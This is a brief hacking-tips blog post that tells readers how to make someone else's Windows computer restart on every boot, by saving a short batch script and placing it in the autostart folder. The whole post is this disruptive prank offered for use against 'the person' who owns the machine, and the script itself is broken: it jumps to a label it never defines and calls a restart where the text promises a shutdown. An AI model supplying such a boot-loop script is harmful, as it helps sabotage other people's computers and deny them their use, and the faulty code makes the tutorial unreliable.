Make a computer shutdown everytime it boots

Paste the below code in notepad and save it as anything.bat

@echo off


cls
start shutdown -r

cls
goto :a

Then just put the file in autostart (which can be fond in the start menu)

So whenever the person starts up the computer, it is shutdown again.


www.nthacks.com © Nischal

0 comments: